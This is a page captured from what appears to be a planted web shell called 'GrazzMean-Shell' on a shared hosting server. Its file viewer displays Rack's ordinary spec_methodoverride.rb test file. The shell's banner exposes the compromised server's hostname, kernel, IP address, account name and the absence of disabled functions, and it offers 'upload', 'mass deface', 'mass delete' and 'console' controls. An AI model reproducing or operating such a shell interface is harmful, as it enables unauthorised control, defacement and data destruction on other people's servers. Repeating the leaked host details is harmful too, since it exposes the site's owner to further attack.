shell bypass 403

GrazzMean-Shell Shell

: /opt/alt/ruby19/lib64/ruby/gems/1.9.1/gems/rack-1.6.4/test/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 3.129.25.152
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : spec_methodoverride.rb 
require 'stringio'
require 'rack/methodoverride'
require 'rack/mock'

describe Rack::MethodOverride do
  def app
    Rack::Lint.new(Rack::MethodOverride.new(lambda {|e|
      [200, {"Content-Type" => "text/plain"}, []]
    }))
  end
  
  should "not affect GET requests" do
    env = Rack::MockRequest.env_for("/?_method=delete", :method => "GET")
    app.call env

    env["REQUEST_METHOD"].should.equal "GET"
  end

  should "modify REQUEST_METHOD for POST requests when _method parameter is set" do
    env = Rack::MockRequest.env_for("/", :method => "POST", :input => "_method=put")
    app.call env

    env["REQUEST_METHOD"].should.equal "PUT"
  end

  should "modify REQUEST_METHOD for POST requests when X-HTTP-Method-Override is set" do
    env = Rack::MockRequest.env_for("/",
            :method => "POST",
            "HTTP_X_HTTP_METHOD_OVERRIDE" => "PATCH"
          )
    app.call env

    env["REQUEST_METHOD"].should.equal "PATCH"
  end

  should "not modify REQUEST_METHOD if the method is unknown" do
    env = Rack::MockRequest.env_for("/", :method => "POST", :input => "_method=foo")
    app.call env

    env["REQUEST_METHOD"].should.equal "POST"
  end

  should "not modify REQUEST_METHOD when _method is nil" do
    env = Rack::MockRequest.env_for("/", :method => "POST", :input => "foo=bar")
    app.call env

    env["REQUEST_METHOD"].should.equal "POST"
  end

  should "store the original REQUEST_METHOD prior to overriding" do
    env = Rack::MockRequest.env_for("/",
            :method => "POST",
            :input  => "_method=options")
    app.call env

    env["rack.methodoverride.original_method"].should.equal "POST"
  end

  should "not modify REQUEST_METHOD when given invalid multipart form data" do
    input = <<EOF
--AaB03x\r
content-disposition: form-data; name="huge"; filename="huge"\r
EOF
    env = Rack::MockRequest.env_for("/",
                      "CONTENT_TYPE" => "multipart/form-data, boundary=AaB03x",
                      "CONTENT_LENGTH" => input.size.to_s,
                      :method => "POST", :input => input)
    begin
      app.call env
    rescue EOFError
    end

    env["REQUEST_METHOD"].should.equal "POST"
  end

  should "not modify REQUEST_METHOD for POST requests when the params are unparseable" do
    env = Rack::MockRequest.env_for("/", :method => "POST", :input => "(%bad-params%)")
    app.call env

    env["REQUEST_METHOD"].should.equal "POST"
  end
end
© 2025 GrazzMean-Shell